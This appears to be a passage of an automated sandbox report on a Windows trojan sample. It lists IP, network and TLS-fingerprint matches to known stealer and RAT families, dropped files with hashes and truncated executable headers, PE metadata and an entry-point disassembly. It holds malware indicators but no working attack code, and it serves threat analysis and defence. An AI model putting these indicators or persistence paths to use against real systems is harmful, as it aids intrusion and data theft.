                            file.exeGet hashmaliciousBlackGuardBrowse
                            • 208.95.112.1
                            PO_20091827994.jsGet hashmaliciousWSHRATBrowse
                            • 208.95.112.1

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            HETZNER-ASDENanoviporedakJbH763PDF.exeGet hashmaliciousUnknownBrowse
                            • 144.76.136.153
                            qsteemp.exeGet hashmaliciousGurcu StealerBrowse
                            • 116.203.17.238
                            Z1A6Zv6Ec3.exeGet hashmaliciousRedLine, VidarBrowse
                            • 116.202.1.79
                            SJv6Gz8cGp.exeGet hashmaliciousRedLine, Typhon LoggerBrowse
                            • 148.251.234.93
                            Ruzvelt.exeGet hashmaliciousVidarBrowse
                            • 116.203.240.51
                            setup1.exeGet hashmaliciousMinerDownloader, Nymaim, RedLine, Vidar, XmrigBrowse
                            • 116.202.1.79
                            virus.exeGet hashmaliciousRedLineBrowse
                            • 148.251.234.93
                            build4.exeGet hashmaliciousGurcu StealerBrowse
                            • 159.69.63.226
                            43252345.exeGet hashmaliciousVidarBrowse
                            • 116.202.1.79
                            VB-SM1248.docx.docGet hashmaliciousUnknownBrowse
                            • 46.4.78.37
                            file.exeGet hashmaliciousModernLoader, XmrigBrowse
                            • 148.251.234.93
                            TcvLObcUJL.exeGet hashmaliciousSocelarsBrowse
                            • 148.251.234.83
                            TQz0yDXXCW.exeGet hashmaliciousSocelarsBrowse
                            • 148.251.234.93
                            SkLi8s5Jr0.exeGet hashmaliciousSocelarsBrowse
                            • 148.251.234.83
                            Et1r81zMw7.exeGet hashmaliciousSocelarsBrowse
                            • 148.251.234.93
                            file.exeGet hashmaliciousVidarBrowse
                            • 116.202.1.79
                            Kt73WMyx0Q.exeGet hashmaliciousRedLineBrowse
                            • 88.99.184.104
                            oBciSu8rBq.exeGet hashmaliciousWannacryBrowse
                            • 144.77.193.14
                            file.exeGet hashmaliciousXmrigBrowse
                            • 148.251.234.93
                            TUT-ASUSHelloKittyCafe.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            SrfFpGhGIc.exeGet hashmaliciousVjW0rm, WSHRATBrowse
                            • 208.95.112.1
                            LOIC.exeGet hashmaliciousUnknownBrowse
                            • 208.95.112.1
                            PeterBot.exeGet hashmaliciousUnknownBrowse
                            • 208.95.112.1
                            persistenceModule.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            qsteemp.exeGet hashmaliciousGurcu StealerBrowse
                            • 208.95.112.1
                            Qukp.exeGet hashmaliciousRedLineBrowse
                            • 208.95.112.1
                            Y9IlbIEYjk.exeGet hashmaliciousVjW0rm, WSHRATBrowse
                            • 208.95.112.1
                            RA2.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            sourcecode.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            Spotify.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            XBinderOutputBREAD.exeGet hashmaliciousUnknownBrowse
                            • 208.95.112.1
                            XClient.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            xw.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            build4.exeGet hashmaliciousGurcu StealerBrowse
                            • 208.95.112.1
                            zCXfw71997.exeGet hashmaliciousUnknownBrowse
                            • 208.95.112.1
                            4XFf8KBC6s.exeGet hashmaliciousNymaim, RedLine, SmokeLoader, onlyLoggerBrowse
                            • 208.95.112.1
                            file.exeGet hashmaliciousBlackGuardBrowse
                            • 208.95.112.1
                            PO_20091827994.jsGet hashmaliciousWSHRATBrowse
                            • 208.95.112.1

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19Korsakoff.exeGet hashmaliciousOrcusBrowse
                            • 144.76.136.153
                            Z1A6Zv6Ec3.exeGet hashmaliciousRedLine, VidarBrowse
                            • 144.76.136.153
                            SJv6Gz8cGp.exeGet hashmaliciousRedLine, Typhon LoggerBrowse
                            • 144.76.136.153
                            Ruzvelt.exeGet hashmaliciousVidarBrowse
                            • 144.76.136.153
                            43252345.exeGet hashmaliciousVidarBrowse
                            • 144.76.136.153
                            rUnderseller.exeGet hashmaliciousGuLoaderBrowse
                            • 144.76.136.153
                            TcvLObcUJL.exeGet hashmaliciousSocelarsBrowse
                            • 144.76.136.153
                            TQz0yDXXCW.exeGet hashmaliciousSocelarsBrowse
                            • 144.76.136.153
                            SkLi8s5Jr0.exeGet hashmaliciousSocelarsBrowse
                            • 144.76.136.153
                            Et1r81zMw7.exeGet hashmaliciousSocelarsBrowse
                            • 144.76.136.153
                            file.exeGet hashmaliciousVidarBrowse
                            • 144.76.136.153
                            conaset_notificacion1004.msiGet hashmaliciousUnknownBrowse
                            • 144.76.136.153
                            file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, Fabookie, SmokeLoaderBrowse
                            • 144.76.136.153
                            k4F4uRTZZR.dllGet hashmaliciousUnknownBrowse
                            • 144.76.136.153
                            file.exeGet hashmaliciousDjvuBrowse
                            • 144.76.136.153
                            wv8pgyY3Fj.exeGet hashmaliciousVidarBrowse
                            • 144.76.136.153
                            2xrKnQfHGt.exeGet hashmaliciousVidarBrowse
                            • 144.76.136.153
                            file.exeGet hashmaliciousVidarBrowse
                            • 144.76.136.153
                            file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                            • 144.76.136.153

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\clip[1].htm

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File Type:HTML document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):169
                            Entropy (8bit):4.51833957423091
                            Encrypted:false
                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGu:q43tISl6kXiMIWSU6XlI5LPtIpfGu
                            MD5:84855C13836B389D5EC7CFD4C9266173
                            SHA1:1CF3056FF23C4176FD7CA9816A000ED461D6D323
                            SHA-256:502083C916AE481CDD413B8D93315300653DF5FB3DCC5770C01991DE19977EAE
                            SHA-512:2479112004884D42D4FFE1174DC358C5D1B0FA2B41641D32F2FB67539C4F834D63CFBBF7E98C63B9A64E49B26390C410BB7E50F1AD4A755F32D081367AF05FCB
                            Malicious:false
                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\json[1].json

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):110
                            Entropy (8bit):4.6071979068611295
                            Encrypted:false
                            SSDEEP:3:YWR4buWsyLBHm+CUAyROfQ8I5CMt6MXLUMgRnY:YWybuiTuOjbUMgRnY
                            MD5:AD4FCD343503CD318D7A6D7032086BC6
                            SHA1:1AC93BB281E3AE8FDC9E76538E2FCAA4382B3FAF
                            SHA-256:F94BB36FFAF71338729A3491BEAC8423FBA77B93E78077B14029865B5EECA77F
                            SHA-512:D16281CB078AEE462F92A44B0C7FB341804A72210F803D81F018BA91D2BB5AABEDF74F8D5E83D2E02BA51DD83DC1FEF455D351C5EA5A87B818DE24F48D17FB24
                            Malicious:false
                            Preview:{"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\LoWin64[1].htm

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File Type:HTML document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):169
                            Entropy (8bit):4.51833957423091
                            Encrypted:false
                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGu:q43tISl6kXiMIWSU6XlI5LPtIpfGu
                            MD5:84855C13836B389D5EC7CFD4C9266173
                            SHA1:1CF3056FF23C4176FD7CA9816A000ED461D6D323
                            SHA-256:502083C916AE481CDD413B8D93315300653DF5FB3DCC5770C01991DE19977EAE
                            SHA-512:2479112004884D42D4FFE1174DC358C5D1B0FA2B41641D32F2FB67539C4F834D63CFBBF7E98C63B9A64E49B26390C410BB7E50F1AD4A755F32D081367AF05FCB
                            Malicious:false
                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[1].json

                            Download File
                            Process:C:\Users\user\AppData\Roaming\MonDisc.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):110
                            Entropy (8bit):4.6071979068611295
                            Encrypted:false
                            SSDEEP:3:YWR4buWsyLBHm+CUAyROfQ8I5CMt6MXLUMgRnY:YWybuiTuOjbUMgRnY
                            MD5:AD4FCD343503CD318D7A6D7032086BC6
                            SHA1:1AC93BB281E3AE8FDC9E76538E2FCAA4382B3FAF
                            SHA-256:F94BB36FFAF71338729A3491BEAC8423FBA77B93E78077B14029865B5EECA77F
                            SHA-512:D16281CB078AEE462F92A44B0C7FB341804A72210F803D81F018BA91D2BB5AABEDF74F8D5E83D2E02BA51DD83DC1FEF455D351C5EA5A87B818DE24F48D17FB24
                            Malicious:false
                            Preview:{"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[2].json

                            Download File
                            Process:C:\Users\user\AppData\Roaming\MonDisc.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):110
                            Entropy (8bit):4.6071979068611295
                            Encrypted:false
                            SSDEEP:3:YWR4buWsyLBHm+CUAyROfQ8I5CMt6MXLUMgRnY:YWybuiTuOjbUMgRnY
                            MD5:AD4FCD343503CD318D7A6D7032086BC6
                            SHA1:1AC93BB281E3AE8FDC9E76538E2FCAA4382B3FAF
                            SHA-256:F94BB36FFAF71338729A3491BEAC8423FBA77B93E78077B14029865B5EECA77F
                            SHA-512:D16281CB078AEE462F92A44B0C7FB341804A72210F803D81F018BA91D2BB5AABEDF74F8D5E83D2E02BA51DD83DC1FEF455D351C5EA5A87B818DE24F48D17FB24
                            Malicious:false
                            Preview:{"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):18817
                            Entropy (8bit):5.001217266823362
                            Encrypted:false
                            SSDEEP:384:ufib4GGVoGIpN6KQkj2Akjh4iUxGzCdaOdB/NXp5CvOjJEYoV4fib41:uIGV3IpNBQkj25h4iUxGzCdaOdB/NZwY
                            MD5:DB93B232EFF0785FDDC28A0D5DAE38D2
                            SHA1:AF5AFE47557C49F165F66B2B63962D9EB28E3157
                            SHA-256:92939214003421B64153B215D15F89595673C709110FC6E005FF955F6684C390
                            SHA-512:5D161CFEE2631553AC2FA8EE407FE4CBA23C9A666BB69049C0FCCBEE99413983C678E4779426532FB4F5E622155C9EFF8DA57CD93AE4453D57301B32C19CBAA9
                            Malicious:false
                            Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gbocbdi.kvq.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kawhk2o.gde.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qozx4m5.52l.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44i2b3mq.hi2.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wv4znnl.zdg.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_flbdtqny.4qu.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxqpokvo.10l.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pebbdlzy.l0u.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4nnfw5d.xih.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbf5ldh3.14x.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vl14jbpt.2qj.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjhgcmtu.twd.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Roaming\MonDisc.exe

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):1619428
                            Entropy (8bit):7.59374824680465
                            Encrypted:false
                            SSDEEP:24576:OWXJJ2t8UZmjAOXwfp8UkSOOyYZtHVyNZQQSFMIND0Kw8qwKGybJZFcwV/Ubf16m:xrcO6uctHVQbIh0Kw87KGoP2wxyV
                            MD5:EEF2E49FD27D42237FFB929E1A39FC2D
                            SHA1:590C0FAFBBE555A8E4C8A7DDB8BD869E7813A1E1
                            SHA-256:B25CF13A5F670BE96946523C31C4FD84F639F397B5AB6D4BD244848CF160BB37
                            SHA-512:4C559EF66F7A62481C708A40D746F84A3B3EBC4B4E7B7B23997493B193EE7954AF4A1C431509EF352D336270976732C55FA105579A37D7B299DF963EE56A1BBE
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 54%
                            • Antivirus: Virustotal, Detection: 56%, Browse
                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........D.........................8.................................................2......2......2.U.......=.....2......Rich....................PE..d...#.Vd..........".................vZ.........@.............................00...........`...........................................-.(...a.,.(.....0.......,.@.............0.....E.-.......................,.(....................................................text...:.,......................... ..`.data.... ....,.. ..................@....vxlang.......,.....................@..@.mir..........-........................`.rsrc.........0.....................@..@.reloc........0.....................@..@................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):1628132
                            Entropy (8bit):7.604723957432385
                            Encrypted:false
                            SSDEEP:24576:DN6DSMx5qk/2h75CFLcCbHgDs1WYorUwevCG0WlKeGJpyP:DN6Cm2CFLPbHksgV1GMaP
                            MD5:79F329EA2EC0C1BAED4F262F79B48BA5
                            SHA1:12068E22E536A9848B24CC3974F250DD015E2F9C
                            SHA-256:5D383D0F6C3455B522237C95D055D938B8FAA8A9DB14CEE25687D9C7004F36E8
                            SHA-512:6B0E08EA30ED7621C4E23E07648C8BDACFAD61704489D683D4A4984B61E4D1EB5D7B1EB61F9AD2912AF90A31D60310B02567FE8EFE92F5FFDC7C0D46E4F7DA8A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 49%
                            • Antivirus: Virustotal, Detection: 54%, Browse
                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........D.........................8.................................................2......2......2.U.......=.....2......Rich....................PE..d.....Vd.........."......,..........pd.........@..............................0...........`..........................................G..(...aP-.(.....0......p-.@.............0.....ED.......................P-.(....................................................text....5-......................... ..`.data.... ...P-.. ..................@....vxlang......p-.....................@..@.mir.........`.........................`.rsrc.........0.....................@..@.reloc........0.....................@..@................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                            Entropy (8bit):6.593979144611313
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            File size:1382400
                            MD5:e1aa70e7ef25fdadd52160e9b9f37b37
                            SHA1:7b1538dbde2ad906db1a03dd62604c787adb6579
                            SHA256:eb9c9eb6572805d03da8b824b1d179301cded34e9c9a71dd1573daa0b2978953
                            SHA512:b81a9e074015ebb3a1dfd22abe4cb3017d331182fd0332019e02dc4d5de126104aaabc093d62879eda3cb7029cbbfd78233c6ec46af1416e497eaac298503ccc
                            SSDEEP:24576:VKgZ9oIV1lNRSNv59kxgHegLOfLcW4q9wFuoqRHb:oYO6lbSNvLHe134q9tRH
                            TLSH:8E559D4A77B505A9E2B7C17DCA464F0AE6B27805072197DF03E453A62F377C40ABB326
                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........D................................8...........................................................2.......2.......2.U.......=....

                            File Icon

                            Icon Hash:5a687d277ccccc73

                            Static PE Info

                            General

                            Entrypoint:0x140080c08
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6456A01B [Sat May 6 18:44:43 2023 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:d3401a6af173fe335f418ac3c9b5c7cc

                            Entrypoint Preview

                            Instruction
                            dec eax
                            sub esp, 28h
                            call 00007F3650BFCDCCh
                            dec eax
                            add esp, 28h
                            jmp 00007F3650BFC4CBh
                            int3
                            int3
                            dec eax
                            sub esp, 28h
                            dec ebp
                            mov eax, dword ptr [ecx+38h]
                            dec eax
                            mov ecx, edx
                            dec ecx
                            mov edx, ecx
                            call 00007F3650BFC6E2h
                            mov eax, 00000001h
                            dec eax
                            add esp, 28h
                            ret
                            int3
                            int3
                            int3
                            inc eax
                            push ebx
                            inc ebp
                            mov ebx, dword ptr [eax]
                            dec eax
                            mov ebx, edx
                            inc ecx
                            and ebx, FFFFFFF8h
                            dec esp
                            mov ecx, ecx
                            inc ecx
                            test byte ptr [eax], 00000004h
                            dec esp
                            mov edx, ecx
                            je 00007F3650BFC6E5h
                            inc ecx
                            mov eax, dword ptr [eax+08h]
                            dec ebp
                            arpl word ptr [eax+04h], dx
                            neg eax
                            dec esp
                            add edx, ecx
                            dec eax
                            arpl ax, cx
                            dec esp
                            and edx, ecx
                            dec ecx
                            arpl bx, ax
                            dec edx
                            mov edx, dword ptr [eax+edx]
                            dec eax
                            mov eax, dword ptr [ebx+10h]
                            mov ecx, dword ptr [eax+08h]
                            dec eax
                            mov eax, dword ptr [ebx+08h]
                            test byte ptr [ecx+eax+03h], 0000000Fh
                            je 00007F3650BFC6DDh
                            movzx eax, byte ptr [ecx+eax+03h]
                            and eax, FFFFFFF0h
                            dec esp
                            add ecx, eax
                            dec esp
                            xor ecx, edx
                            dec ecx
                            mov ecx, ecx
                            pop ebx
                            jmp 00007F3650BFC6EEh
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
